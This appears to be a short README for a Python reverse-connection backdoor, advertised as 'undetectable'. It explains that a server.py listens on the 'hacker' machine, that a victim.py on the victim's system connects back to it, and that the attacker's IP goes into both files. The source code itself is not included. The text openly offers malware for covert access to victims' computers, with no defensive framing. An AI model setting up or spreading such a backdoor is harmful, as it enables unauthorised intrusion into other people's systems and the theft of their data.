This tool is a undetectable Backdoor built using python
What is Backdoor?
Backdoor is a method used by hackers to bypass the normal authentication or encryption in a computer.
-
In hacker ystem, there will be
server.pywhich will listen for all the incoming connections. -
In the victims system, there will be
victim.pywhich will send the connection to our hacking machine. -
Replace
ip = " "withip = " <HACKER's IP> "in both server.py and victim.py